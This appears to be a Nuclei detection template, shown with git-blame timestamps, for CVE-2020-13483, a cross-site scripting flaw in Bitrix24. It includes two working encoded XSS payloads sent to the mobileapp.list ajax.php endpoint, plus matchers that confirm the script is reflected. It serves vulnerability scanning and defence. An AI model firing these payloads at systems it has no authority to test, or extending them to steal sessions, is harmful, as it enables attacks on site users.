2021-03-10 02:53:48 +00:00
id : CVE-2020-13483
info :
2022-09-16 19:50:10 +00:00
name : Bitrix24 <=20.0.0 - Cross-Site Scripting
2022-01-19 08:14:01 +00:00
author : pikpikcu,3th1c_yuk1
2022-09-16 20:03:07 +00:00
severity : medium
2022-09-16 19:50:10 +00:00
description : The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade to a patched version of Bitrix24 (version >20.0.0) to mitigate this vulnerability.
2022-01-19 08:14:01 +00:00
reference :
- https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
- https://twitter.com/brutelogic/status/1483073170827628547
2022-09-16 19:50:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-13483
2021-09-10 11:26:40 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2020-13483
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00113
2023-12-12 11:07:52 +00:00
epss-percentile : 0.44511
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : bitrix24
product : bitrix24
2023-12-05 09:50:33 +00:00
tags : cve,cve2020,xss,bitrix,bitrix24
2021-03-10 02:53:48 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-10 02:53:48 +00:00
- method : GET
path :
2022-01-19 08:14:01 +00:00
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'
2021-03-10 02:53:48 +00:00
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
2022-01-19 08:14:01 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2021-03-10 02:53:48 +00:00
matchers-condition : and
matchers :
- type : word
2022-01-19 08:14:01 +00:00
part : body
2021-03-10 02:53:48 +00:00
words :
2022-01-19 08:14:01 +00:00
- '<a href="/*">*/)});function __MobileAppList(){alert(1)}//'
2021-05-11 18:55:14 +00:00
- "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
2022-01-19 08:14:01 +00:00
condition : or
2021-03-10 08:49:10 +00:00
- type : word
2022-01-19 08:14:01 +00:00
part : header
2021-03-10 08:49:10 +00:00
words :
- text/html
2021-03-10 02:53:48 +00:00
- type : status
status :
- 200
2023-12-29 09:30:44 +00:00
# digest: 4a0a0047304502207530e16db3290c098635fcf19f5ad38a048b2ee77cff4a3e6f500ca6605d0c11022100b6a3f1edf2b36949b864b54640e415c5e3a6ef2d717150a9cda46abb062bdbc4:922c64590222798bb761d5b6d8e72950